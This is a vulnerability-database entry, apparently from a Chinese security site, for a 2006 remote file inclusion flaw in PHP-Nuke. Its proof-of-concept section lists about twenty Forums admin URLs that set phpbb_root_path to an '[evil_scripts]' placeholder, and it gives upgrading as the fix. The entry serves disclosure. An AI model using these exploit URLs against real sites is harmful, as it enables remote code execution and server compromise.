PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions

基本字段

漏洞编号:
SSV-16152
披露/发现时间:
未知
提交时间:
2006-06-02
漏洞等级:
漏洞类别:
远程文件包含
影响组件:
PHP-Nuke
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.2KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Milli-Harekat Advisory ( www.milli-harekat.org )
# PHP-Nuke <= All version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : PHP NUKE ALL VERSION
# Credits : ERNE
# Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
# Vulnerable :
http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
# milw0rm.com [2006-06-02]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1226
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负